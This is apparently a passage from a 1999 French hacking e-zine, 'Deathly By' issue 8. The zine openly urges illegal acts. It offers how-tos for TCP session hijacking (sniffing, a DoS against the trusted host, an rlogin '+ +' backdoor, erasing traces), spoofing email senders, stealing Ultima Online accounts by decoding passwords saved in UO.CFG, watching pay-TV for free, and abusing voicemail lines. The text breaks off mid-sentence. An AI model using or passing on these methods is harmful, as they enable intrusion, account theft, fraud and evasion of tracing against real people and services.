l ÛÛÛÛÛÜ Û ÛÛ ÛÛ ÛÛ o ÛÛ ßÛÛÜ ÜßÛßÛßÜ ÛÛÛÛÛÛÛÛÛ ÛÛ ÛÛ g ÛÛ ÛÛ Üß Û Û ßÜ ÛÛ ÛÛ ÛÛ o ÛÛ ÛÛ ÜÜÜÜÜÜ ßÜÜÜÛ Û Û Û ÛÛ ÛÛ ÜÜÜÜÜ ÛÛ ÜÜ ÜÜ ÛÛ ÛÛ ÛÛßßßßÛÛ ßÛßßßßÜÜÜÛÜß ÛÛ ÛÛÛßßßßßÛÛ ÛÛ ÛÛ ÛÛ b ÛÛ ÜÛÛ ÛÛÛÛÛÛÛß ÛßÜ ÜÛßßßß ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ y ÛÛÜÜÛÛß ßÛÜÜÜÜÜÜ Û ßßßßßß Û ÛÛÛÜÜÜÜ ÛÛ ÛÛ ÛÛ ÛÛÜÜÜÜÛÛ ßßßßß ßßßßßßß ß Û ßßßßßß ßß ßß ßß ßßßßßÛÛ N ß ÛÛ e ÜÜ ÛÛ s ÛÛÛÛÛÛÜ ÛÛ ÛÛ ßÛÛÛÛÛÛß q ÛÛ ÛÛ ÛÛ ÛÛ u ÛÛÜÜÜÛß ßÛÛÛÛÛÛÛ ß Ûßß Ûßß Û Û Ûßß Û Û Û Û i ÛÛßßßÛÜ ÛÛ Û ßßÛ ßßÛ Û Û Ûß Û Û Û Û K ÛÛ ÛÛ ÛÛ ß ßßß ßßß ßß ßßß ß ß ß / ÛÛÛÛÛÛß ÛÛÛÛÛÛÛß C C 9 9 [DEATHLY by....ISSUE 8] [.......Août 1999.....] EDITARD Nous avons changé de logo mais nous gardons toujours le même état d'esprit!!! ------------------------------------------------------------------------------------------------ !VIVE LA DEMOCRATIE, LIBERTES EGALITES FRATERNITES! FUCK OPPRESSION...go to hell! FUCK REPRESSION...go to hell! ------------------------------------------------------------------------------------------------ DiskLamez: Le texte qui constitue l'essence de ce zine est constitue d'informations a but EXPLICATIF UNIQUEMENT... IL EST STRICTEMENT INTERDIT PAR LA LOI DE LIRE LA SUITE!!! ENCORE MOINS DE FAIRE C'KY A ECRIT! JE NE SUIS PAS RESPONSABLE!!! SUICIDE MAY CAUSE DEATH !!!!!!!! ------------------------------------------------------------------------------------------------ OFFicierz: Cedru -->Cedru13@hotmail.com Fugitif -->Fugitif@hotmail.com FuNzZy -->FuNzZy@Hotmail.com Eldre8 -->eldre8@cyberdude.com Goliath59 -->Goliath59@hotmail.com Little Bob -->littlebob57@yahoo.fr M@X -->axel_spirit@yahoo.com Kaly -->Kaly35@yahoo.com Mitix -->titux@chez.com MufUm -->mufum@caramail.com DRooPY -->droopykiller@hotmail.com Deepspy -->deepspy@caramail.com Faust -->faust19@caramail.com Krtman -->krtman@caramail.com Doc -->amadho@excite.fr Tr4iTs_Pl4t & Roswell -->marc189@caramail.com Dark Ange| -->dark_angel357@yahoo.com Letoul -->letoul@hotmail.com Ulyss3 -->ulyss3@bigfoot.com Lucifer48 -->lucifer48@yahoo.com Masa -->hardneo@hotmail.com Nas --> il en a pas Neurologic -->neurologic@caramail.com Sulfur X -->sulfur_x@caramail.com Jacker -->jacker@altern.org Zoxp -->ZoxP@aol.com Cybz -->root@cybz.8m.com Kissi -->kissi1@caramail.com Crash -->crashoverflow@hotmail.com diabolikk99 -->diabolikk99@wanadoo.fr Page Web: http://www.multimania.com/deathlyby2/ Nous avons déménage, car on c'est fait efface sur deathlyby! :) Vous y trouverez des progs, des liens et bien sur les n° du zine... ------------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------------ ************************************************************************************************ Sommmaire ************************************************************************************************ -- Service courrier By Cedru -- Les meilleurs sites Web By Cedru -- Les râgots du net By Cedru -- Le SPOOFING a la dure !!! by Eldre8 -- Comptes Ultima Online by Flusher -- Hacker un bureau de tabac by ZoxP -- Faire un site WaReZ qui se fait pas (enfin pas trop) effacer By Dark Angel -- 'Lu les skwatters de VMB ! By Jacker -- LE PHENOMENE DE RODAGE By Cybz -- Hack de VMB 0800 90 02 72 + no verts By kissi -- 'Lu ts les anti-FT ! By Jacker -- Exploit : Retina vs. IIS4 , round 2 By Dahlia -- Exploits By Cedru -- Carding By Def BonD -- Les devoirs d'un hacker By Crash -- Les passwords shadows By Crash -- Les ovni By Roswell -- Comment niquer les transports en commun Lillois By diabolikk99 -- L'aspect psychologique du Troyen By DRooPY -- Les prochains articles + Le mot de la fin ================================================================================================ Service courrier By Cedru ================================================================================================ Salut Courrier lecteur de DB 7. --- Salut, -->Si tu veux des cartes intercall, il y en a 1 dans -->Par contre laissez tombez le 0800 397 397, le num_ro http://fanzines.cjb.net rubriques phreak! -->Est ce que tu connais un certains Silk? ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ -->Si tu veux des pass de ftp voila l'un des pass de --- Arf.. donc ce mec cherche a me retrouver.. :) Quel plaisir.. En effet, tu ne semble pas avoir repondu a sa question, mais 'Silk' (moi) est le mec qui lui a hacke sa page web pourrav d'i-france y'a qq semaines. J'ai ete 'gentil' : je n'ai pas change son pass ni ses infornmations perso, de sorte qu'il a recupere l'acces a son site en 1 semaine. Je me demandes maintenant si je l'ai pas ete trop gentil : son site est tjrs aussi lamentable et il continue de se calmer 'underground' Sans compter qu'il ne lit meme pAS les Zines qu'il leech, sinon il saurait qui je suis.. Au fait, vieux, t'as meme fait une faute dans ton eMail sur la premiere page de ton site.. ifrance, ca s'ecrit sans tiret.. Bref je lui forward ce msg egalement :) > http://fanzines.cjb.net 80Mbs de ezines underground > (h/p/c/v) et 500mbs > d'_mulateurs (N64, PSX, Super Nes, ...) mais oui.. et pourquoi pas 3 Go d'eZines pompes sur madchat.org, des textes pompes sur d'autres sites, et de l'incitation a faire de la pub sur internet.. quelle beau site 'underground' ! arf// arf/// qui dit mieux ? ;) Enfin, belle partie de plaisir. ifrance.com/ezines L:ezines P:moulle ! lol ;) Salut Cedru, c'est moi DEFBOND ,et passe le bonjour à tout le reste de l'equipe... Je trouve votre magazine super et...Bon on va arrêter la leche! Parlons de chose sérieuse...donc j'ai mis du temps pour te repondre car ça faisait 15 jours que j'avais pas vérifier ma boite au lettre. Donc j'ai une nouvelle à t'annoncer, j'ai trouver un numéro de vert internationnal et en français!!!(que Dieu bénisse france télécon) c'est le 0800 90 36 33!!!! Je répete pour les sourds et les malentendants: 0800 30 36 33!! Bon un numéro vert internationnal avec un PABX c'est bien joli mais faut aussi des VMB!(nd MAD MAX:t'as trouver ça tout seul? T'es forttttttttttttttttt!!!!!) Donc j'au une vmb c'est la 1111 mais j'en ai aussi d'autre et j'ai penser à vous,(nd Moi:Je suis trop généreux) donc je te file 2 numéros de vmb avec leurs code d'acces: VMB:2275 CODE:XXXX VMB:2310 CODE:XXXX Mais il faut savoir que ces VMB appartiennent à des personnes!(on peut pas tout avoir non plus) Bon maintenant j'explique comment ça se présente: Ce numéro fonctionne 24h/24, quand on appelle on tombe sur un répondeur (d'apres l'accent du type ça doit être une boite Canadienne) il faut faire l'étoile (*) puis .....et puis c'est pas la peine de vous expliquer c'est en Français! Donc CEDRU tu donne ça à qui tu veux! Bon moi DEfBOND faut s'avoir que je suis JOI-GNA-BLE... Donc sur le 0800 90 36 33 ma BAL est 1111. sur le 0800 397 397 ma BAL est 8707. sur le 0800 900 272 ma BAL est 3230. Information de derniere minute: Sur le 0800 90 36 33 on peut avoir une ligne télécopieur gratos et y a pleins d'autre fonctions pas mals tels qu'un réveil qui appelle le numéro que tu veux!!! Bon la j't'envoie une lettre pas tres technique mais je te promet d'écrire un article sur CANAL + L'intégral!!! Sur ce,j'aimerais que tu fasse un peu de PUB pour moi dans ton prochain numéro en donnant mes numéros de BAL car je cherche un maître JEDI qui recrute dans le HAKING/CRACKING. Bon allez je te laisse et je vais faire un scan sur le 0800 90 12 12... Bon allez salut (nd de MAD MAX:t'as déjà oublier ce que je t'ai dit!!)... A ouais y a MAD MAX qui passe le bonjours à toute l'équipe! Allez.........Bonne continuation et vive l'illégalité!!! ================================================================================================ Les meilleurs sites Web By Cedru ================================================================================================ acces diver 2.9 sur le site de notre ami Dark Angel http://dark66.da.ru On fonce pour la défonce !!! www.pharmagroup.com Dans la section "Our products" ================================================================================================ Les râgots du net By Cedru ================================================================================================ Ndcedru : Méthode bien expliquer pour voir kiosque gratos bon allez....j'ai 2 minutes pour expliquer : Tout d'abord , il faut trouver la chaine magique ... si elle fonctionne , t'as du bol ... elle est revenu depuis hier (17/07/99) Pour trouver la chaine magique : - je me calle sur un canal du kiosque , par exemple K1 - l'ecran devient noir au bout de quelques minutes - je zap de la chaine 1 à la chaine 20 (ou 10 , ou 20 , ou 30 ... moi je le fais de 20 en 20 ) - je suis sur la chaine 20 , je zap sur 71 (K1) - l'ecran est toujours noir ... la chaine magique n'est pas une des 20 premieres chaines - je recommence l'operation en reprenant de la chaine 21 jusqu'a la chaine 40 - je suis sur la chaine 40 , je zap sur 71 (K1) - l'ecran est noir ,la chaine magique n'est pas dans les 40 premieres .Si le film est revenu ,la chaine se trouve entre les chaines 21 et 40.( ou entre les chaines faisant parti de la fourchette que vous avez determine) - dans cet exemple la chaine magique se trouve entre les chaines 21 et 40 - j'attends l'ecran noir de K1 - pour determine la chaine : je zap les chaines 1 par 1 en intercalant K1 21,K1-22,K1-23,K1-24,K1 .... jusqu'a ce que K1 soit decode. Si ca decode apres 22 , 22 est la chaine magique,Si ca decode apres 23 , 23 est la chaine magique etc ...... Et apres que faire ? Eh bien suivez l'exemple ci-dessous : exemple : je veux regarder k1 : - je met k1 en chaine preferee - je met la chaine magique en chaine prefere - je met toute les chaines se trouvant entre ces 2 chaines en chaine non preferee - je choisi le mode zap en chaine preferee - je regarde k1 - j'ai droit au 5 ou 10 minutes gratuites de k1 - l'ecran k1 devient noir - je zap avec la fleche vers la chaine magique - la chaine magique est selectionnee - je zap vers k1 - k1 est selectionnee - le bandeau de presentation apparait - j'appui sur 0 (zero) - le bandeau disparait - j'ai droit a un nouvel extrait ... et c'est reparti pour un tour : je perd seulement 2 ou 3 secondes toutes les 5 ou 10 minutes et quequondit a ttbifrocotin , on dit merci parce que c'est magique ... pourvu que ça dur (ça c'est moins sur) ... mais aujourd'hui comme c'est la SAISON .... qui sait .... Ndcedru : Overclocker sa souris! C'est déballant ! Il existe utilitaire qui fait passer la vitesse de la souris PS2 de 40 Hz (je crois) à 200 Hz maxi contre 125 Hz pour une souris USB ! Ceux qui n'ont jamais vu une souris USB se demanderont l'intérêt : Il est bien simple : Une souris qui ne saccade plus quand on la secout sous Windows et surtout une vitesse et une précision diabolique sous Half-Life ou Quake2. Vous êtes septique ? Faite une recherche sous ftpsearch de PS2rate et testez. La différence est flagrante ! Yesssss !!!!! Excellent mon ptit SlyAngel, excellente trouvaille ! G testé, car je l'avoue, j'étais septique, et j'ai appliqué une fréquence de 200 Hz à mon port PS2, et ouaaaahhhhh !! G une souris ultra fluide ! J'espère que ca n'abime pas prématurément le port PS2, C tout ! Eh ben, c'est debile!!! j'y croyais pas, et quand j'ai testé: Zou, la souris!! il y a une bonne amélioration!! Overcloker une souris HaHa!! et pourtant.... C'est le chat qui va etre content... meow! c'est vrai que c'est assez fort comme truc on à l'impression d'avoir une souris de station sun!!!!! A quand les peltier sur port ps/2.... c'est vrai que c'est assez fort comme truc on à l'impression d'avoir une souris de station sun!!!!! A quand les peltier sur port ps/2.... A mon avis ca vient du system d'exploitation (win 98) parce que soius win nt ma souris sur ps/2 etait deja "plus fluide" que sur win98 maintenant grace a ce programme c'est pareil pour les deux. Voila, c'etait juste une remarque comme ca. Génial ce PS2RATE !!! Mais je suis sûr qu'il y en a qui vont nous gonfler avec la migration des éléctrons dans le port PS2 Pour tous les nouveaux vous pouvez telechargez Ps2rate sur mon site perso.wanadoo.fr/markotechpage Et c'est vraiment sans danger overclocké sa souris? Je voudrais pas tout bousiller! Arrêtez de vous émerveiller les mecs! Aucun risque pour l'overclock; Ce n'est pas un overclock!!! Ps2rate ça fait un momment que ça existe et si quelqu'un a une souris logitech wheel mouse cordless (mulot sans fil) qu'il me dise SVP si ça marche et avec quel pilotes. La mienne se fout completemment de PS2rate, elle reste à 80 Hz. Avec une souris acheté 50 boules à carouf, ca marche impec. HELP! A+ Et avec une tablette wacom ? Risque, pas risque... salut j'ai un mulot logitech avec le clavier sans fil j'ai pas mit les drivers ! et ça mache bien a 200 et ça se voie nikel se machin ca existe pour les souris sur port com Essayer de jouer à un doomlike, C carrément excellent !! Sans cet utilitaire, sous Unreal quand je tournais la tete, on croyait presque que ca ramait, alors que quand j'avancais tout droit, le mouvement était parfaitement fluide... C que le port PS2 tournait à 40 Hz, au début, donc ma souris était rafraichit 40 fois par seconde et par conséquent, quand je tournais la tete, j'avais au max 40fps, alors qu'en marche j'avait, plus de 100 (timerefresh sous HL en 800x600 : 117 fps).. Et depuis que j'ai mis ma souris en 200Hz, et bien les 117 fps quand je tourne la tete sont affichées... Et pour une fluidité encore plus optimale, j'ai activé le Vsynch comme ca, G pile 60 images seconde sans les effets pas beau que fait le Vsynch activé (fréquence de mon écran avec une)... Et là, C la fluidité max meme dans les scènes très lourdes, que cela soit sous Unreal, HL, ou Q2... en 800x600 pips posted 06-24-99 12:43 PM CT (US) excellent !!!!!!!! c'est vrai que dans HL ca change tout ! Je voudrais juste savoir si il n'y a pas risque de flasher prematurement mon port PS/2 ... (je n'y connais rien en PS/2) ================================================================================================ Le SPOOFING a la dure !!! by Eldre8 ================================================================================================ Salut! Il existe plusieurs techniques de spoofing, les techniques comme celles de l'article de Cedru qui sont en fait un peu connu (et qui ne s'appelle pas vraiment du spoofing, pardon Cedru! Aie!Ouch!) ndcedru : alors toi tu l'appel comment? (c'est du spoofing sous windows), et au moins on en parle pas chez piratemag. , il existe un autre cote du spoofing qui est le hijacking (ndcedru : voir pirate mag tellement c'est connu comme méthode). Mitnick a utilisé cette méthode d'ailleurs pour poser un backdoor, et un con l'a ouvert ce qui lui a permis de rentrer sur le pc. (comme quoi même les élites utilisent des trojans....) qui peut se diviser en 2 techniques: -le blind spoofing (pour les anglophobes=> blind=aveugle) -le non-blind spoofing Pour etre en parfait accord avec le spoofing et ses debuts vous devez posseder: -Linux (Slackware car RedHat a beaucoup de problemes de compilation, si vous ne voulez pas galerer je vous conseille d'eviter RedHat, note: je n'ai pas teste la Debian...) -des bases en langage C (non fournit dans cette article) [pas oblige] -des bases en TCP/IP (fournit dans cette article) -quelques prog pour debuter (fournit dans cette article) Je pose comme base que vous savez vous debrouillez sous Linux sans avoir tout le temps un Kde, bref en touchant les utilitaires de base du systeme En fait le spoofing ne sert pas vraiment a etre anonyme sur le net mais plutot de profiter d'une connexion en telnet qui va nous permettre d'avoir au minimum un compte utilisateur ce qui nous permettra ensuite de (peut-etre) prendre le fichier passwd et de le decrypter ensuite ou bien d'autres choses. Mais l'attaque peut aussi se porter sur d'autres ports, peut etre aussi interressant... Normalement la plupart des attaques spoofing se font sur le port 513(rlogin) un systeme qui ne demande pas de pass, et qui est etabli entre 2 machines, definie par le fichier .rhosts dans lequel les addresses ip des 2 machines sont presentes signifiant la confiance entre ses 2 machines(par l'absence de password), si on y met '+ +' alors la machine va faire confiance a tout le monde! Je vais tout d'abord vous eclairer un peu sur le fonctionnement du TCP/IP, puis nous verrons le spoofing proprement dit. Il vous faudra quelques programmes que j'ai decri en fin d'article. Fonctionnement de TCP/IP ------------------------ Bon, en fait il y 2 protocole dans TCP/IP, IP est le protocole de base(niveau 1) et sur lequel est TCP(qu'on pourrait appeler un protocole de niveau 2), qui a son mecanisme de securite avec ACK/SEQ, il existe d'autre protocole de niveau 2 comme UDP qui n'a aucun mechanismes de securite c'est pourquoi on ne le rencontre que tres peu. Les informations que l'on envoie sur un reseau par tcp/ip sont fragmentes en paquets, ces paquets contiennent plusieurs info : ndcedru : Voir la bible Tcp/ip pour le schéma et les définitions. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ TCP Header Si vous etes un peu trouble par l'abscence de IP source et IP destination, c'est parce que ceci est un paquet TCP qui repose sur le protocole IP qui lui contient le paquet TCP et 1 champ pour l'adresse IP source et 1 autre pour l'adresse IP destination et d'autres champs... Ce qui nous interressent ici, dans le cas spoofing, sont les champs: -SEQuence number qui est stoque sur 32 bits -ACKnowledgement number qui est stoque sur 32 bits Prenons l'exemple d'une connexion entre 2 machines, A et B: *A demande une connexion vers B A ----------------> B ACK=554D0F23 SEQ=67BDE098 *B repond a cette demande A <---------------- A ACK=67BDE098 SEQ=554D0F25 *A repond encore une fois A ----------------> B ACK=554D0F25 SEQ=67BDE09C Comme vous avez pu le remarquer le mechanisme de securite de TCP/IP est assez simple, le SEQ de la demande est repris tel quel dans ACK de la reponse, il y a le ACK de la demande qui a ete incremente de 1 mais nous observons un decalage plus important dans un reseau reel ou plusieurs ordi accedent au meme serveur. Puis dans la reponse de B il renvoie donc les donnees. La cle dans le spoofing est d'obtenir le SEQ qui va nous permettre de voler la connexion. Malheureusement pour les packets il n'y a pas que l'adresse IP qui definit une machine, il y a aussi une adresse MAC qui est specifique a chaque ordi, et c'est a cause de la presence de cet adresse MAC que nous ne verrons pas les reponses du serveur une fois le hijack effectue, mais cela peut se corriger avec des utilitaires comme hunt mais qui ne marche que sur reseau ethernet(enfin j'en suis pas sur, il faut essayer!) Bon, maintenant que vous avez les bases, nous alons passer a la pratique: Le Non-Blind spoofing --------------------- Pour utiliser cette methode il faut que vous vous trouviez sur le reseau que vous voulez attaquer, donc avec une carte reseau sur votre ordi(PC,MAC,SUN,...) Sur un reseau normal, donc avec des ordi relies par carte reseau, quand A veut acceder sur B, cet connexion va passer demander a chaque machine sur le reseau qui est B, c'est a dire que la demande va passer par les machines N, E et plein d'autres. Donc pour commencer il vous faut une machine sur le reseau et que vous ayez acces au root sur celle-ci (c'est pas un probleme, vous empruntez le portable d'un amis et vous lui mettez une carte reseau et un zoli Linux SlackWare), 1 nous allons utiliser un programme qui va SNIFFER le reseau, c'est a dire va recevoir les paquets qui ne lui sont pas destine, comme le message de A vers B; le but ne sera pas de lire ce message mais de prendre le numero SEQ vu plus haut 2 nous quittons le sniffer et allons bloque la machine A pour eviter qu'elle envoie de nouveaux SEQs avec un FLOODER(DoS) 3 nous allons voir un programme permettant l'HIJACK de cette connexion, et comme valeur que nous demandera ce prog, nous lui donnerons le numero SEQ que l'on vient juste de connaitre. Vous lancez la connexion vers B... l'HIJACK echoue!!! mais POURQUOI??? (non pas l'Orangina :!) Et bien, me direz vous, c'est parce que pendant le temps ou j'ai connu ce numero SEQ et le temps ou je ai bloque la machine A, ce numero a ete irremediablement incremente! (je sais, c'est naturellement ce que vous alliez me dire, non?) Donc pour palier a ce little probleme, nous revenons au SNIFFER, nous prenons 2 valeurs de SEQ a une intervalle de 1 seconde et nous allons comme cela deduire la valeur de SEQ qu'il nous faudra entrer pour avoir la connexion, et cela marchera! Nous nous retrouverons a la place de A et nous aurons la connexion vers B, si A est root cela veut dire que nous nous retrouvons root!!! Comme nous ne voyons pas les reponse du serveur, on y place un backdoor, si on a spoofer sur le port 513 donc rlogin je vous laisse deviner... <-- (plus-haut) Comme ca on pourra apres se reloguer et avoir une vraie session rlogin. Bon, naturellement, de nos jours, cette technique est tres connu et c'est pourquoi il existe un programme qui regroupe les deux programmes ci-dessus, SNIFFER+HIJACK= HUNT (en version 1.3 now) ce qui rend le non-blind spoofing presque trop facile:) Le Blind spoofing ----------------- Toi qui lit cet article, tu te trouve surement connecte sur l'internet par l'intermediaire d'un ISP et peut etre par PPP (ligne telephonique), pour spoofer il te faudra utiliser cette technique, pour les chanceux connectes par les ecoles d'ingenieurs ou autres vous pourrez utiliser les 2 techniques... Donc ici, nous avons un probleme pour obtenir le SEQ entre A et B puisque, etant sur un modem, nous ne pouvons pas sniffer! Mais par contre nous pouvons connaitre NOTRE numero SEQ en se connectant sur un port quelconque de la machine B(si on veut prendre la place de A). Donc nous nous connectont sur le port 80 par example(le plus repandu) avec un prog qui va recuperer le numero SEQ(differents progs en annexe), 1 seconde plus tard nous recuperons de nouveau le SEQ et nous en deduisons a peu pres le SEQ possible(oui, vous avez devinez, c'est du hasard!), tout de suite apres on bloque la machine A avec un joli DoS (DenialOfService) pour eviter qu'elle incremente encore le SEQ et enfin on se connecte avec le SEQ precedemant calcule soit la connection se produit et vous criez de joie(pas trop fort quand meme!), soit vous n'avez pas de connection et vous recommencez! C'est en experimentant que l'on devient experimentateur -euh,non,je crois que c'est pas ca?- m'enfin, vous avez compris ma pensee! Bien sur dans le Blind spoofing il y a un point crucial: est-ce que A est connecte sur B ??? Et oui pour ca il faut supposer! avec des commande comme: showmount rcpinfo qui permette de voir si B fait confiance a A par example pour rlogin Mais bon, si tout les donnees etaient connues des le depart ce seraient moins marrant! Et fallait un peu s'y attendre avec le titre de cet article! Spoofing etendue ---------------- Bon, ce que j'appelle le spoofing etendue sera en fait essayer de recevoir les reponses, on peut le faire sur un reseau, et sur ppp cela doit etre possible aussi, il faudra commencer par decouvrir le numero MAC(ou ARP) de A et de coder ensuite son propre prog de hijack. Danger ------ Bon, il faut etre franc, de toute facon dans toutes activites illegales, il y a toujours des risques, risques que je vais detailler ici: En fait le risque ne se situe pas vraiment sur le moment de l'attaque mais plutot apres, quand vous aurez atteint un compte n'oublie jamais les regles de securite(pour nous, pas pour la cible!), effacer bien toutes vos traces! Annexe ------ Donc ici quelques progs interressants pour debuter et ou les trouver, note pour le champ comments, quand je mais blind cela signifie naturellement que cela marche aussi et biensur dans le non-blind spoofing. Nom Type Comments Ou? --- ------- -------- --- sniffit 0.3.5 SNIFFit(???) non-blind sniffit.rug.ac.be tcpdump sniffer pas pratique non-blind Sur votre cd Linux Hunt 1.3 sniff+hijack[must] non-blind www.dislessici.org/products.php3 sirc3 n SEQ+hijack[must] blind mon site ou altavista cips1.3 hijack[not only TCP] blind mon site ou altavista synk4.c flooder blind www.rootshell.com getarp0.2a IP->MAC blind mon site ou altavista et bien d'autres, mais le mieux est de coder son propre spoofer, premierement c'est interressant(vous connaitrez bien la prog C TCP/IP apres) et deuxiement il faut quand meme le meriter ce spoof. Allez! Bon spoofing et Might the code be with you little jedi! mon site: www.multimania.com/eldre8/ck/stuff.html ou alors vous pouvez alez voir un superbe site avec plein de prog: ftp://sunsite.unc.edu vous y trouverez sans doute tout les progs imaginable et inimaginable pour Linux ou pour s'amuser : http://sunsite.unc.edu:21 ;) =============================================================================================== Email anonyme By Jacker =============================================================================================== Disclaimer : La lecture de cet article implique l'acceptation de ce disclaimer. Le contenu de cet article est à titre purement éducatif et informatif. En aucun cas l'auteur n'incite le lecteur au non-respect de la loi, sous toute forme qu'il soit. En conséquence, aucune poursuite ne pourra être faite contre ni l'auteur, les autres membres de la rédaction, l'hébergeur et toute personne (physique ou morale) ayant un lien avec la publication de ce article. 'Lu tout le monde, Si t'es 1 lamer tu dois trouver que le spoof SMTP pr envoyer des emails anonymes, c galère. Tout le monde peut avoir besoin de faire croire à qqun que le msg vient pas de son envoyeur. En gros, qui n'as jamais envoyé des lettres anonymes ? Le pb avec les emails c ke y'a l'adresse en ht. Pas coool... V'la l'explication de l'astuce : ton courrier entrant et sortant n'est pas géré par la même machine : c le POP pr l'entrée et le SMTP pr la sortie. Le POP a pa besoin d'1 login et d'1 pass pr marcher. Le SMTP, pa la peine ! C coooool !!! Dc, tu ouvre les prefs de ton soft de mail : pr ex, Netscape Messenger et tu changes ds "Mail & Newsgroup" (scuz' g pas le vf) : Identity - Your name = "Anonyme" - Email address = "anonyme@isp-bidon.com" - Reply-to address = "anonyme@isp-bidon.com" Mail servers - Outgoing mail (SMTP) server = SMTP public (voir plus pas) - ... username = "" (kedal) C tout. Pr le SMTP public, soit tu prends ton ISP (en général ça marche), ms un bon liseur de Headers pr tjrs retrouver le truc, soit tu prend un public comme mail.compuserve.com (hé oui, c public et ca marche impek). Après tu fais ton msg, tu signes pas et tu désactive ta signature (hé, fallait kan même y penser !). Ms fait gaffe, il faut qu'il y ai ke ce msg sinon les autres vont recevoir des trucs zarb. Ou alors tu crée 1 user. Si t'as 1 pb pr comprendre le truc, je px rien faire pr toi à part te dire que le serveur SMTP en a rien à fouttre de ta vraie email. Dc tu px avoir n'importe kel adresse et ca marche pareil. 'Lu à Toi, Snike's, o-o-seven, The Kid, Slummy et autres ! NB : Y'a aucun risk de mailer anonyment sauf si tu vx assassinner qqun où on pt tracer avec les headers pr remonter juska ton IP et savoir ton ISP et après savoir qui était conecté à telle IP à telle heure en demandant à l'ISP. Ms pr ca, fo que les keufs s'en mellent. Have fun! _________________________________________________________ Jacker VMB in France: 0800900272,,,2,4000# Trois programmeurs se rencontrent dans un urinoir. Après avoir fait ce qu'ils avaient à y faire, Le premier se dirige vers l'appareil distributeur mural, prend une dizaine de serviettes, s'essuie copieusement les mains et dit "Nous chez Intel, on nous apprend à être propres et méticuleux." Le second prend une seule serviette et dit "Nous chez Microsoft, on nous apprend à être propres, méticuleux et... économes." Le troisième se dirige directement vers la sortie et dit "Nous, chez Apple, on ne nous apprend rien... mais on ne se pisse pas sur les mains !" =============================================================================================== Comptes Ultima Online by Flusher =============================================================================================== Disclaimer : ce que vous allez lire là est illégal et publié à titre informatif uniquement. (le baratin habituel au cas où le droit d'expression ne serait pas respecté) Introduction: Bon, pour ceux qui seraient pas au courant, Ultima Online (alias UO pour les intimes) est un jeu de rôle online fait par Origin Worlds Online dans lequel vous vous glissez dans la peau d'un personnage et puis vous en faîtes ce que vous voulez : un mage, un bourrin, un voleur (lol) ... Un jeu passionnant faut l'avouer ... Seulement ces enfoirés, chez Origin, vu que c'est un jeu qui nécessite un serveur entretenu par eux-même, ils fonts payer un abonnement mensuel de l'ordre de 60 balles par mois pour pouvoir garder un maximum de 5 personnages par compte !!! Mais c'est du vol, alors que le jeu coûte déjà la peau du c.. vu qu'il est difficilement trouvable en France !!! Cet article va tenter de vous expliquer comment hacker le compte Ultima Online d'un gars qui a installé le jeu sur son pc. NB : Un compte UO est composé d'un login et d'un password. Les deux éléments sont spécifiés par le joueur lors de l'inscription (qui requiert le numéro marqué au dos du cd UO) donc on a peu de chance de tomber sur un compte du genre login: "#`]e91mP¤$" et password: "pF[5°£ù2" ... C'est déjà ça ... Attention : cette technique ne fonctionnera que si la victime a coché la case permettant de sauvegarder le mot de passe (et c'est le cas chez 90% des joueurs héhéhéhé) ! I) Extraction d'un compte Ultima Online à partir du fichier UO.CFG: Avant de commencer à proprement parler des techniques de hacking de comptes UO, il faut savoir un minimum de choses sur le stockage du compte Ultima Online notamment. Bon, disons que de ce côté-là, ils ont été particulièrement nuls chez Origin parce que, lorsque le joueur coche la case "Remember password" (moi le premier je le fais, fainéant que je suis !), tout est enregistré dans le fichier UO.CFG, dans le répertoire du jeu. C'est que attention, le login n'est pas crypté mais le password l'est, lui ! Je vous sens crispés tout à coup ;o) Meuh non, stressez pas, l'algo de cryptage est à mourir de rire !!! Décrémentation de 13 dans le code ASCII si supérieur à 60 sinon incrémentation de 82 !!! Mouuuuarrrrfffff MDR !!! Allez pour ceux qui n'auraient pas compris, voici un exemple de fichier UO.CFG : -------------------------------------- CdRomDataPath=c:\jeux\UO ........ AcctID=Ultimateur AcctPassword=sv"(o|#z ........ (y a plein d'autres trucs mais nous on s'en tape) -------------------------------------- On en déduit que le compte UO de la victime est : Login: Ultimateur Password: sv"(o|#z (mince alors c'est crypté !) Allez ! Faut s'y coller maintenant ----> décryptage du password :o) On va se le faire à la main pour rigoler ! Déjà, on l'écrit verticalement et on fait correspondre le code ASCII de chaque caractère, puis on retranche 13 si supérieur à 60 ou on ajoute 82 si inférieur, et on fait correspondre le caractère correspondant en faisant Alt + code ASCII (exemple : Alt + 80 donne le caractère "P"). Pass crypté Code ASCII -13 ou +82 Pass décypté s 115 102 f v 118 105 i " 34 116 t ( 40 122 z o 111 98 b | 124 111 o # 35 117 u z 122 109 m Bingo !!! Le compte Ultima Online de la victime est donc : Login: Ultimateur Password: fitzboum (inutile d'essayer, c'est un exemple ;o] ) II) A la pêche aux UO.CFG: C'est cool, maintenant on sait extracter un compte UO à partir du fichier UO.CFG de la victime si elle a coché la case "Remember password" !!! Mais on fait comment pour l'avoir son UO.CFG, à la victime ??? Bon eh ben y a pas 36 solutions ! - étape n°1 : Vous jouez à UO avec le compte d'un pote et puis vous vous faîtes des 